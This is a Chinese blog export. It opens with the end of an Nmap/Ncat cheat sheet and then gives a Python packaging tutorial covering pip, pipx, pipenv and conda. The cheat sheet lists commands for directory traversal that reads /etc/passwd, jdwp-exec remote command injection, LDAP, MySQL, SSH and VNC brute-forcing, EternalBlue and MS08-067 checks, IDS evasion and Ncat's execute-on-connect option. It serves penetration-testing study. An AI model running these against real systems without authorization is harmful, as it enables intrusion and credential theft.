class="line"></span><br><span class="line">尝试通过执行<span class="variable constant_">HTTP</span>谓词篡改绕过密码保护的资源（<span class="variable constant_">HTTP</span> <span class="number">401</span>状态）。如果未设置要检查的路径数组，它将爬网<span class="title class_">Web</span>服务器，并对找到的任何受密码保护的资源执行检查。</span><br><span class="line">nmap -sV --script http-method-tamper &lt;target&gt;</span><br><span class="line">nmap -p80 --script http-method-tamper --script-args <span class="string">&#x27;http-method-tamper.paths=&#123;/protected/db.php,/protected/index.php&#125;&#x27;</span> &lt;target&gt;</span><br><span class="line"></span><br><span class="line">通过尝试检索 /etc/passwd 或 \boot.<span class="property">ini</span> 来检查<span class="title class_">Web</span>服务器是否容易受到目录遍历的攻击。</span><br><span class="line">nmap --script http-passwd --script-args http-passwd.<span class="property">root</span>=<span class="regexp">/test/</span> &lt;target&gt;</span><br><span class="line"></span><br><span class="line">在<span class="variable constant_">HTTP</span>服务器上搜索包含易受<span class="variable constant_">SQL</span>注入攻击的查询的<span class="variable constant_">URL</span>。它还从找到的网站中提取表单，并试图识别易受攻击的字段。</span><br><span class="line">nmap -sV --script=http-sql-injection &lt;target&gt;</span><br><span class="line"></span><br><span class="line">利用多个<span class="variable constant_">TP</span>-<span class="title class_">Link</span>无线路由器中存在的目录遍历漏洞进行攻击。攻击者可以利用此漏洞远程读取任何配置和密码文件，而无需进行身份验证。</span><br><span class="line">nmap -p80 --script http-tplink-dir-traversal.<span class="property">nse</span> &lt;target&gt;</span><br><span class="line">nmap -p80 -<span class="title class_">Pn</span> -n --script http-tplink-dir-traversal.<span class="property">nse</span> &lt;target&gt;</span><br><span class="line">nmap -p80 --script http-tplink-dir-traversal.<span class="property">nse</span> --script-args rfile=<span class="regexp">/etc/</span>topology.<span class="property">conf</span> -d -n -<span class="title class_">Pn</span> &lt;target&gt;</span><br><span class="line"></span><br><span class="line">尝试检测<span class="title class_">Wordpress</span> <span class="number">4.7</span><span class="number">.0</span>和<span class="number">4.7</span><span class="number">.1</span>中的权限提升漏洞，该漏洞允许未经身份验证的用户在帖子中注入内容。</span><br><span class="line">nmap --script http-vuln-cve2017-<span class="number">1001000</span> --script-args http-vuln-cve2017-<span class="number">1001000</span>=<span class="string">&quot;uri&quot;</span> &lt;target&gt;</span><br><span class="line">nmap --script http-vuln-cve2017-<span class="number">1001000</span> &lt;target&gt;</span><br><span class="line"></span><br><span class="line">检测指定的<span class="variable constant_">URL</span>是否容易受到<span class="title class_">Apache</span> <span class="title class_">Struts</span>远程代码执行漏洞（<span class="variable constant_">CVE</span>-<span class="number">2017</span>-<span class="number">5638</span>）的攻击。</span><br><span class="line">nmap -p &lt;port&gt; --script http-vuln-cve2017-<span class="number">5638</span> &lt;target&gt;</span><br><span class="line"></span><br><span class="line">检测采用英特尔主动管理技术的系统是否容易受到<span class="variable constant_">INTEL</span>-<span class="variable constant_">SA</span>-<span class="number">00075</span>权限提升漏洞（<span class="variable constant_">CVE</span> <span class="number">2017</span> -<span class="number">5689</span>）的攻击。</span><br><span class="line">nmap -p <span class="number">16992</span> --script http-vuln-cve2017-<span class="number">5689</span> &lt;target&gt;</span><br><span class="line"></span><br><span class="line">通过使用恶意负载探测<span class="title class_">Web</span>服务器并检测响应代码和正文中的更改，尝试确定<span class="title class_">Web</span>服务器是否受<span class="variable constant_">IPS</span>（入侵防御系统）、<span class="variable constant_">IDS</span>（入侵检测系统）或<span class="variable constant_">WAF</span>（<span class="title class_">Web</span>应用程序防火墙）保护。</span><br><span class="line">nmap -p80 --script http-waf-detect &lt;host&gt;</span><br><span class="line">nmap -p80 --script http-waf-detect --script-args=<span class="string">&quot;http-waf-detect.aggro,http-waf-detect.uri=/testphp.vulnweb.com/artists.php&quot;</span> www.<span class="property">modsecurity</span>.<span class="property">org</span></span><br><span class="line"></span><br><span class="line">尝试检测<span class="title class_">Web</span>应用程序防火墙的存在及其类型和版本。</span><br><span class="line">nmap --script=http-waf-fingerprint &lt;targets&gt;</span><br><span class="line">nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.<span class="property">intensive</span>=<span class="number">1</span> &lt;targets&gt;</span><br><span class="line"></span><br><span class="line">试图利用java的远程调试端口。当远程调试端口保持打开状态时，可以注入java字节码，实现远程代码执行。这个脚本滥用这个特性来注入和执行一个<span class="title class_">Java</span>类文件，这个文件执行提供的shell命令并返回它的输出。</span><br><span class="line">nmap -sT &lt;target&gt; -p &lt;port&gt; --script=+jdwp-exec --script-args cmd=<span class="string">&quot;date&quot;</span></span><br><span class="line"></span><br><span class="line">试图利用java的远程调试端口。当远程调试端口保持打开状态时，可以注入java字节码，实现远程代码执行。这个脚本注入并执行一个返回远程系统信息的<span class="title class_">Java</span>类文件。</span><br><span class="line">nmap -sT &lt;target&gt; -p &lt;port&gt; --script=+jdwp-info</span><br><span class="line"></span><br><span class="line">试图利用java的远程调试端口。当远程调试端口保持打开状态时，可以注入java字节码，实现远程代码执行。此脚本允许注入任意类文件。</span><br><span class="line">nmap -sT &lt;target&gt; -p &lt;port&gt; --script=+jdwp-inject --script-args filename=<span class="title class_">HelloWorld</span>.<span class="property">class</span></span><br><span class="line"></span><br><span class="line">尝试强制<span class="variable constant_">LDAP</span>身份验证。默认情况下，它使用内置的用户名和密码列表。为了使用您自己的列表，请使用 userdb 和 passdb 脚本参数。</span><br><span class="line">nmap -p <span class="number">389</span> --script ldap-brute --script-args ldap.<span class="property">base</span>=<span class="string">&#x27;&quot;cn=users,dc=cqure,dc=net&quot;&#x27;</span> &lt;host&gt;</span><br><span class="line"></span><br><span class="line">对<span class="title class_">MySQL</span>执行密码猜测。</span><br><span class="line">nmap --script=mysql-brute &lt;target&gt;</span><br><span class="line"></span><br><span class="line">尝试列出<span class="title class_">MySQL</span>服务器上的所有数据库。</span><br><span class="line">nmap -sV --script=mysql-databases &lt;target&gt;</span><br><span class="line"></span><br><span class="line">尝试列出<span class="title class_">MySQL</span>服务器上的所有用户。</span><br><span class="line">nmap -sV --script=mysql-users &lt;target&gt;</span><br><span class="line"></span><br><span class="line">检测易受远程代码执行漏洞（称为<span class="variable constant_">MS</span> <span class="number">08</span> -<span class="number">067</span>）攻击的<span class="title class_">Microsoft</span> <span class="title class_">Windows</span>系统。这种检查是危险的，它可能会使系统崩溃。</span><br><span class="line">nmap --script smb-vuln-ms08-<span class="number">067</span>.<span class="property">nse</span> -p445 &lt;host&gt;</span><br><span class="line">nmap -sU --script smb-vuln-ms08-<span class="number">067</span>.<span class="property">nse</span> -p <span class="attr">U</span>:<span class="number">137</span> &lt;host&gt;</span><br><span class="line"></span><br><span class="line">尝试检测<span class="title class_">Microsoft</span> <span class="title class_">SMBv</span> <span class="number">1</span>服务器是否易受远程代码执行漏洞（ms <span class="number">17</span> -<span class="number">010</span>，即<span class="title class_">EternalBlue</span>）。该漏洞被<span class="title class_">WannaCry</span>和<span class="title class_">Petya</span>勒索软件以及其他恶意软件积极利用。</span><br><span class="line">nmap -p445 --script smb-vuln-ms17-<span class="number">010</span> &lt;target&gt;</span><br><span class="line">nmap -p445 --script vuln &lt;target&gt;</span><br><span class="line"></span><br><span class="line">对ssh服务器执行暴力密码猜测。</span><br><span class="line">nmap -p <span class="number">22</span> --script ssh-brute --script-args userdb=users.<span class="property">lst</span>,passdb=pass.<span class="property">lst</span> \</span><br><span class="line">      --script-args ssh-brute.<span class="property">timeout</span>=4s &lt;target&gt;</span><br><span class="line"></span><br><span class="line">对<span class="variable constant_">VNC</span>服务器执行强力密码审核。</span><br><span class="line">nmap --script vnc-brute -p <span class="number">5900</span> &lt;host&gt;</span><br><span class="line"></span><br><span class="line">漏洞扫描</span><br><span class="line">nmap -sV --script vulners [--script-args mincvss=&lt;arg_val&gt;] &lt;target&gt;**</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="防火墙-x2F-入侵检测-绕过"><a href="#防火墙-x2F-入侵检测-绕过" class="headerlink" title="防火墙&#x2F;入侵检测 绕过"></a><strong>防火墙&#x2F;入侵检测 绕过</strong></h2><ul>
<li><strong><code>nmap -sS -T4</code>    使用-sS  识别被拦截的端口</strong></li>
<li><strong><code>nmap -sF</code>  使用fin扫描</strong></li>
<li><strong>使用 -6 ipv6扫描</strong></li>
<li><strong>TCP FTP反弹扫描（ <code>-b</code> ）</strong></li>
<li><strong><code>--scan-delay 1075ms</code>   指定延长扫描时间绕过检测</strong></li>
<li><code>**nmap -p 80,443 --script-args http.useragent=&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3&quot; -A &lt;domain&gt;</code>  修改默认ua头**</li>
</ul>
<h1 id="NCAT-🥺"><a href="#NCAT-🥺" class="headerlink" title="NCAT 🥺"></a><strong>NCAT 🥺</strong></h1><h2 id="使用技巧"><a href="#使用技巧" class="headerlink" title="使用技巧"></a><strong>使用技巧</strong></h2><ul>
<li><strong>-p  指定源端口</strong></li>
<li><strong>-s 指定绑定源地址</strong></li>
<li><strong>-l 监听</strong></li>
<li><strong>-m  最大连接数，默认100,windows默认60</strong></li>
<li><strong>-k  通常，侦听服务器只接受一个连接，然后在连接关闭时退出。此选项使其接受多个同时连接，并在所有连接关闭后等待更多连接。</strong></li>
<li><code>**--broker</code> （连接代理） 允许多方连接到集中的Ncat服务器并相互通信。Ncat可以代理位于NAT之后或无法直接连接的系统之间的通信。此选项与 <code>--listen</code> 一起使用，这会使 <code>--listen</code> 端口启用代理模式。**</li>
<li><code>**--chat</code> （临时“聊天服务器”）**</li>
<li><code>**-e *&lt;command&gt;*</code> 、 <code>--exec *&lt;command&gt;*</code> （执行命令）建立连接后执行指定的命令。命令必须指定为完整路径名。**</li>
<li><code>**-c *&lt;command&gt;*</code> 、 <code>--sh-exec *&lt;command&gt;*</code> （通过sh执行命令）**</li>
<li><code>**--allow</code> ip1 ,ip2 指定的主机列表将是唯一允许连接到Ncat进程的主机。所有其他连接尝试都将被断开。如果 <code>--allow</code> 和 <code>--deny</code> 之间存在冲突，则优先使用 <code>--allow</code> 。主机规范遵循Nmap使用的相同语法。**</li>
<li><code>**--allowfile</code> 这与 <code>--allow</code> 具有相同的功能，除了允许的主机是在一个新行分隔的允许文件中提供的，而不是直接在命令行上提供的。**</li>
<li><code>**--deny</code>  <code>--denyfile</code>  拒绝连接，同上**</li>
<li><code>**-i *&lt;time&gt;*</code> 、 <code>--idle-timeout *&lt;time&gt;*</code> （指定空闲超时），为空闲连接设置固定超时。如果达到空闲超时，则连接终止。可用于传文件，传输完成后指定延时退出**</li>
</ul>
<h1 id="参考文章-💣"><a href="#参考文章-💣" class="headerlink" title="参考文章 💣"></a><strong>参考文章 💣</strong></h1><ul>
<li><a href="https://nmap.org/book/toc.html">**https://nmap.org/book/toc.html</a>  nmap官方book**</li>
<li><strong>man手册</strong></li>
</ul>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>tool</category>
        <category>Nmap</category>
      </categories>
      <tags>
        <tag>Tools</tag>
        <tag>Nmap</tag>
      </tags>
  </entry>
  <entry>
    <title>Python 项目管理</title>
    <url>/2024/02/20/Python-%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/</url>
    <content><![CDATA[<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline green"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2024</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>02-20</p>
</div></div><div class='timeline-item-content'><hr>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><aside>
🔫 在学习使用 python 的过程中，会遇到诸如创建、使用、部署、测试 python 项目，不可避免的会遇到各种环境，依赖，版本兼容等等各种问题，本文章围绕这些主题，介绍当下主流的几种解决方案。

<p>本文章的目的旨在帮助大家更好的学习关于 python 项目环境管理的相关主题知识。相信看完这篇文章后，大家对 python 的项目管理方式，各种环境配置，依赖解决，版本控制等等问题都能够手到擒来。能够清晰的找到问题的解决方案。文章较长，耐心观看。</p>
</aside>

<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><aside>
🔫 Python 项目管理是什么，关于本文章在此提到的 Python 项目管理指的是在使用 Python 过程中，对于 Python 的测试环境、项目文件、目录结构、版本控制、虚拟环境物理环境、依赖包管理等等的问题解决方案的集合。本文章会通过当下主流的相关工具进行论述，涉及到官方工具以及开源社区的工具。

<p>当涉及到 Python 项目管理时，有许多工具可供选择，如 pip、pipx、conda、pipenv、poetry 和 rye 等。这些工具都有各自的特点和优势，可以帮助测试人员以及开发者更好地组织、部署和维护Python项目。本文章会逐个介绍这几款工具的特点、功能，以及使用方式，使用场景。可根据自己的工作流，习惯，选择合适的产品使用。</p>
</aside>

<h2 id="依赖包"><a href="#依赖包" class="headerlink" title="依赖包"></a>依赖包</h2><blockquote>
<p>Python的依赖包是指在Python生态系统中，开发者可以通过软件仓库来获取和安装的第三方模块或库。这些依赖包是由Python社区的开发者们开发和维护的，用于扩展Python的功能和提供各种功能和工具。在一个使用python开发的项目中，需要先安装相关依赖包才可以运行。</p>
</blockquote>
<h2 id="项目文件"><a href="#项目文件" class="headerlink" title="项目文件"></a>项目文件</h2><blockquote>
<p>在一个 python 项目中，可能会存在着，<code>requirements.txt</code>，<code>setup.py</code>，<code>Pipfile</code> 和 <code>Pipfile.lock</code>，**<code>poetry.lock</code>**  等等文件，这些都是定义当前项目所需要的依赖包的相关文件，用于确定当前项目运行、测试等等所需要的依赖包</p>
</blockquote>
<h2 id="requirements-txt"><a href="#requirements-txt" class="headerlink" title="requirements.txt"></a><strong>requirements.txt</strong></h2><blockquote>
<p><code>requirements.txt</code>是一个在python项目中常见的文本文件，用于列出项目所依赖的具体Python库及其版本号。</p>
</blockquote>
<p>例如：</p>
<blockquote>
</blockquote>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">SomeProject</span><br><span class="line">SomeProject == <span class="number">1.3</span></span><br><span class="line">SomeProject &gt;= <span class="number">1.2</span>, &lt; <span class="number">2.0</span></span><br><span class="line">SomeProject[foo, bar]</span><br><span class="line">SomeProject ~= <span class="number">1.4</span><span class="number">.2</span></span><br><span class="line">SomeProject == <span class="number">5.4</span> ; python_version &lt; <span class="string">&#x27;3.8&#x27;</span></span><br><span class="line">SomeProject ; sys_platform == <span class="string">&#x27;win32&#x27;</span></span><br><span class="line">requests [security] &gt;= <span class="number">2.8</span><span class="number">.1</span>, == <span class="number">2.8</span>.* ; python_version &lt; <span class="string">&quot;2.7&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="虚拟环境"><a href="#虚拟环境" class="headerlink" title="虚拟环境"></a>虚拟环境</h2><blockquote>
<p>Python 虚拟环境是一种用于隔离Python项目的方式，创建一个独立的Python环境，使得每个项目都可以拥有自己的依赖库和运行环境、程序版本，而不会相互干扰。从而不会导致多个项目之间因为依赖版本问题导致运行错误等等。所以在使用python时，可以为每个项目设置一个虚拟环境。物理环境则相反。</p>
</blockquote>
<hr>
<h1 id="Pip"><a href="#Pip" class="headerlink" title="Pip"></a>Pip</h1><aside>
🔫 pip 是 Python 的包安装程序。可以使用 pip 从 Python 包索引和其他索引安装包。

<p>项目地址：<a href="https://github.com/pypa/pip">https://github.com/pypa/pip</a></p>
</aside>

<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a><strong>安装</strong></h2><ul>
<li>安装 <code>python</code> 后也包含了 <code>pip</code>。关于 python 的安装方法</li>
<li>windows：使用系统上的微软商店安装，搜索python，选择版本，点击安装，会自动配置好环境变量等环境。也可使用包管理器安装</li>
<li>linux：使用包管理器安装</li>
<li>mac：使用包管理器安装</li>
</ul>
<aside>
🔫 `python --version` 检测python版本信息
`python -m pip --version` 检测pip版本信息

<p>如果执行成功表明安装成功，某些情况可能安装后会没有 pip 命令，使用python执行以下命令进行安装pip 。 <code>python -m ensurepip --upgrade</code>  .</p>
<p>或者直接从系统软件仓库安装pip。如 arch linux 系统下使用 <code>yay -S python-pip</code></p>
</aside>

<h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><ul>
<li><strong>升级</strong> <code>python -m pip install --upgrade pip</code></li>
<li><strong>安装软件包</strong></li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">python -m pip install SomePackage            </span><br><span class="line">python -m pip install SomePackage==<span class="number">1.0</span><span class="number">.4</span>    </span><br><span class="line">python -m pip install <span class="string">&#x27;SomePackage&gt;=1.0.4&#x27;</span>    </span><br><span class="line"></span><br><span class="line">**项目文件中存在 requirements.txt 文件，以下命令安装该项目声明的所有依赖</span><br><span class="line">python -m pip install -r requirements.txt</span><br><span class="line"></span><br><span class="line">使用freeze命令根据当前文件夹生成requirements.txt</span><br><span class="line">python -m pip freeze &gt; requirements.txt**</span><br><span class="line"></span><br><span class="line">指定包升级</span><br><span class="line">python -m pip install --upgrade PackageName</span><br><span class="line"></span><br><span class="line">升级所有</span><br><span class="line">python -m pip install --upgrade </span><br><span class="line"></span><br><span class="line">在“可编辑”模式下安装本地项目。方便本地调试修改包测试</span><br><span class="line">python -m pip install -e .                # 本地目录安装包</span><br><span class="line">python -m pip install -e path/to/project  # 指定目录安装包</span><br><span class="line"></span><br><span class="line">指定软件仓库镜像地址安装包</span><br><span class="line">python -m pip install --index-url http:<span class="comment">//my.package.repo/simple/ PackageName</span></span><br><span class="line"></span><br><span class="line">要列出已安装的软件包：</span><br><span class="line">python -m pip <span class="built_in">list</span></span><br><span class="line"></span><br><span class="line">要显示有关已安装软件包的详细信息，请执行以下操作：</span><br><span class="line">python -m pip show sphinx</span><br><span class="line"></span><br><span class="line">用户安装，将包安装到用户特定的目录，实现与全局包隔离不冲突</span><br><span class="line">python -m pip install --user SomePackage</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>卸载软件包</strong></li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">卸载指定软件包</span><br><span class="line">python -m pip uninstall simplejson  </span><br><span class="line"></span><br><span class="line">卸载requirements.txt 文件中列出的软件包</span><br><span class="line">python -m pip uninstall -r requirements.txt </span><br></pre></td></tr></table></figure>

<ul>
<li><strong>常用功能</strong></li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">python -m pip <span class="built_in">list</span>  列出所有</span><br><span class="line"></span><br><span class="line">显示有关一个或多个已安装软件包的信息。</span><br><span class="line">python -m pip show sphinx</span><br><span class="line"></span><br><span class="line">生成需求文件</span><br><span class="line">python -m pip freeze &gt; requirements.txt</span><br><span class="line"></span><br><span class="line">根据需求（及其所有依赖项）构建python包，然后安装</span><br><span class="line">python -m pip wheel --wheel-dir=/tmp/wheelhouse SomePackage</span><br><span class="line">python -m pip install --no-index --find-links=/tmp/wheelhouse SomePackage</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>配置</strong></li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">配置默认pypi镜像地址，解决可能会存在的网络问题</span><br><span class="line">pip config <span class="built_in">set</span> global.index-url https:<span class="comment">//pypi.tuna.tsinghua.edu.cn/simple</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>总结</strong></p>
</blockquote>
<p>pip 是 python 默认的包管理器，使用广泛，但是在python的完整工作流中，功能单一不全，无环境隔离等功能，适合临时使用。</p>
<blockquote>
</blockquote>
<hr>
<h1 id="Pipx"><a href="#Pipx" class="headerlink" title="Pipx"></a>Pipx</h1><aside>
🔫 在隔离环境中安装和运行 Python 应用程序，该工具会直接把软件仓库的python包安装到隔离环境中。

<p>pip 是适用于库和应用程序的通用包安装程序，没有环境隔离。Pipx 是专门为应用程序安装而设计的，因为它增加了隔离性，但仍使应用程序在 shell 中可用：Pipx 为每个应用程序及其关联的包创建一个隔离的环境。</p>
<p>项目地址：<a href="https://github.com/pypa/pipx">https://github.com/pypa/pipx</a></p>
</aside>

<h2 id="安装-pipx"><a href="#安装-pipx" class="headerlink" title="安装 pipx"></a><strong>安装 pipx</strong></h2><ul>
<li>使用pip安装pipx，<code>pip install --user  pipx</code></li>
<li>添加环境变量保证可以直接运行 <code>python -m pipx ensurepath</code></li>
</ul>
<blockquote>
<p><strong>升级 pipx</strong></p>
</blockquote>
<ul>
<li><code>python3 -m pip install --user -U pipx</code>  || -U 就是 - -upgrade</li>
</ul>
<h2 id="使用-1"><a href="#使用-1" class="headerlink" title="使用"></a><strong>使用</strong></h2><ul>
<li>使用 pipx 安装python包</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipx install PACKAGE 安装指定包</span><br><span class="line"></span><br><span class="line">pipx reinstall-all 重新安装已经安装的所有包</span><br></pre></td></tr></table></figure>

<ul>
<li>或者，您可以在不安装程序的情况下运行它：</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipx run pycowsay moooo!</span><br><span class="line"></span><br><span class="line">可以运行本地文件，以及远程仓库软件包</span><br></pre></td></tr></table></figure>

<ul>
<li>列出安装的包</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipx <span class="built_in">list</span></span><br></pre></td></tr></table></figure>

<ul>
<li>更新包</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipx upgrade package  更新指定包</span><br><span class="line">pipx upgrade-all   更新所有包</span><br></pre></td></tr></table></figure>

<ul>
<li>删除包</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipx uninstall package 删除指定包</span><br><span class="line">pipx uninstall-all 删除所有包</span><br></pre></td></tr></table></figure>

<ul>
<li>pipx runpip</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">从虚拟环境中运行pip命令</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>总结</strong></p>
</blockquote>
<p>pipx 仅用于应用程序使用：您可以使用它安装 CLI 应用程序。所以使用场景仅仅是用它来安装使用一些python应用程序，pipx会自动隔离它们。并不作为项目环境，依赖管理，版本控制等使用场景。</p>
<blockquote>
</blockquote>
<hr>
<h1 id="Pipenv"><a href="#Pipenv" class="headerlink" title="Pipenv"></a>Pipenv</h1><aside>
💩 Pipenv 是一个 Python virtualenv 管理工具，它支持多种系统，并很好地整合了 pip、python（使用系统 python、pyenv，或 asdf）和 virtualenv 。

<p>Pipenv 会自动为您的项目创建和管理虚拟环境，并在您安装&#x2F;卸载软件包 <code>Pipfile</code> 时添加&#x2F;删除软件包。它还生成一个项目 <code>Pipfile.lock</code> ，用于确定包。</p>
<p>项目地址：<a href="https://github.com/pypa/pipenv">https://github.com/pypa/pipenv</a><br>官方文档：<a href="https://pipenv.pypa.io/en/latest/">https://pipenv.pypa.io/en/latest/</a></p>
</aside>

<blockquote>
<p>功能特点</p>
</blockquote>
<ul>
<li>您不再需要单独使用 <code>pip</code> 和 <code>virtualenv</code> ：它们协同工作。</li>
<li>管理虚拟环境以及依赖包</li>
</ul>
<hr>
<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li><code>pip install --user pipenv</code>  使用 pip 安装。</li>
</ul>
<h1 id="常用功能"><a href="#常用功能" class="headerlink" title="常用功能"></a>常用功能</h1><ul>
<li><code>Pipfile.lock</code> 替换了大多数 Python 项目中使用的 <code>requirements.txt</code> 文件，并增加了跟踪上次锁定的包哈希的安全优势。此文件通过锁定操作自动管理。应将 <code>Pipfile</code> 和 <code>Pipfile.lock</code> 添加到项目的源代码管理中。</li>
<li><code>pipenv install -r path/to/requirements.txt</code>   从<code>requirements.txt</code>  导入包到<code>pipfile</code></li>
<li><code>pipenv requirements</code>    从<code>pipfile</code> 文件中生成<code>requirements.txt</code> 输出</li>
</ul>
<h2 id="参数选项"><a href="#参数选项" class="headerlink" title="参数选项"></a>参数选项</h2><ul>
<li><code>--where</code>  输出项目环境物理路径</li>
<li><code>--venv</code>   输出虚拟环境路径</li>
<li><code>--py</code>     输出虚拟环境下 python 可执行文件路径</li>
<li><code>--envs</code> 输出环境变量选项</li>
<li><code>--rm</code>  删除当前目录下的虚拟环境</li>
<li><code>--support</code>   输出<code>pipfile.lock</code>  文件内容</li>
<li><code>--site-packages / --no-site-packages</code>   开启虚拟环境下的<code>site-packages</code></li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">操作系统接口的特定于平台的 Python 绑定通常只能通过系统包管理器使用，因此无法安装到具有 pip 的虚拟环境中。在这些情况下，可以创建具有系统 site-packages 目录访问权限的虚拟环境：</span><br><span class="line">$ pipenv --site-packages</span><br></pre></td></tr></table></figure>

<ul>
<li><code>--python</code>  指定 python 版本号</li>
<li><code>--clear</code>  清除 pip pipenv 的缓存文件</li>
<li><code>-q, --quiet</code>  安静模式</li>
<li><code>--pypi-mirror</code>  设置软件包源</li>
<li><code>pipenv check</code>  检查 PyUp Safety 安全漏洞以及 Pipfile 中提供的 PEP 508 标记。</li>
<li><code>pipenv clean [OPTIONS]</code>   卸载 Pipfile.lock 中未指定的所有包。</li>
<li><code>pipenv graph [OPTIONS]</code>  显示当前安装的依赖项关系图信息。</li>
<li><code>pipenv install [OPTIONS] [PACKAGES]…</code>   安装提供的包并将它们添加到 Pipfile，或者（如果没有提供包），从 Pipfile 安装所有包。</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipenv install --dev 从Pipfile安装开发包类别和默认包类别</span><br></pre></td></tr></table></figure>

<ul>
<li><code>pipenv lock [OPTIONS]</code>  生成 Pipfile.lock。</li>
<li><code>pipenv open [OPTIONS] MODULE</code>    在编辑器中查看给定的模块。</li>
<li><code>pipenv requirements [OPTIONS]</code>  从 Pipfile.lock 生成 requirements.txt。</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipenv requirements --dev  包含dev包</span><br><span class="line">pipenv requirements &gt; requirements.txt  </span><br></pre></td></tr></table></figure>

<ul>
<li><code>pipenv run [OPTIONS] COMMAND [ARGS]…</code>   运行一个安装在 virtualenv 中的命令。</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipenv run pip freeze 输出 requirements.txt 列表</span><br></pre></td></tr></table></figure>

<ul>
<li><code>pipenv shell [OPTIONS] [SHELL_ARGS]...</code>  在 virtualenv 中生成一个 shell。</li>
<li><code>pipenv sync [OPTIONS]</code> 安装 Pipfile.lock 中指定的所有包。</li>
<li><code>pipenv uninstall [OPTIONS] [PACKAGES]…</code>  卸载提供的包并将其从 Pipfile 中删除。</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">pipenv uninstall --all  删除虚拟环境中的所有包，但不删除pipfile 文件</span><br><span class="line">pipenv uninstall --all-dev  从虚拟环境中删除所有开发包，并删除pipfile文件</span><br></pre></td></tr></table></figure>

<ul>
<li><code>pipenv update [OPTIONS] [PACKAGES]…</code>  在未指定包或升级时运行锁定，然后进行同步。</li>
<li><code>pipenv upgrade [OPTIONS] [PACKAGES]…</code>  解析提供的包并将它们添加到 Pipfile，或者（如果没有给出包），将结果合并到 Pipfile.lock</li>
<li><code>pipenv verify [OPTIONS]</code>  验证 Pipfile.lock 中的哈希值是否为最新。</li>
</ul>
<h2 id="工作流程"><a href="#工作流程" class="headerlink" title="工作流程"></a>工作流程</h2><ul>
<li><code>cd myproject</code> 进入项目文件夹</li>
<li><code>pipenv sync</code>   如果有pipfile文件，从pipfile文件安装包</li>
<li><code>pipenv install &lt;package&gt;</code>  安装包，将包添加到pipfile文件中</li>
<li><code>pipenv install --dev</code>    安装所有包，以及dev包</li>
<li><code>pipenv update</code>  更新所有包</li>
<li><code>pipenv upgrade &lt;package&gt;</code>  指定包更新</li>
<li><code>pipenv shell</code>  进入虚拟环境交互式shell</li>
</ul>
<blockquote>
<p><strong>总结</strong></p>
</blockquote>
<p>pipenv 简洁易用，对于需要快速部署环境隔离，项目运行部署，pipenv是一个不错的选择，pipenv拥有版本控制，环境隔离，依赖安装等等功能。使用场景，当前有一个python项目需要测试运行，需要使用到隔离环境，安装依赖，pipenv是可以说最快速的一个方案。</p>
<blockquote>
</blockquote>
<hr>
<h1 id="Conda"><a href="#Conda" class="headerlink" title="Conda"></a>Conda</h1><aside>
🔫 适用于任何语言的包、依赖和环境管理 - Python、R、Ruby、Lua、Scala、Java、JavaScript、C/C++、Fortran 等。在 Windows、macOS 和 Linux 上运行的开源包管理系统和环境管理系统。Conda 可快速安装、运行和更新包及其依赖项。Conda 可以轻松地在本地计算机上创建、保存、加载和切换环境。

</aside>

<h2 id="安装-1"><a href="#安装-1" class="headerlink" title="安装"></a>安装</h2><blockquote>
<p>conda 的安装包分为两种 Miniconda 和 Anaconda。根据自己需求选择包安装。</p>
</blockquote>
<p>Miniconda 是 Anaconda 提供的最小安装程序。如果您想自己安装大多数软件包，请使用此安装程序。</p>
<p>Anaconda Distribution 是一个功能齐全的安装程序，带有一套用于数据科学的软件包，以及 Anaconda Navigator，一个用于处理 conda 环境的 GUI 应用程序。</p>
<blockquote>
</blockquote>
<hr>
<ul>
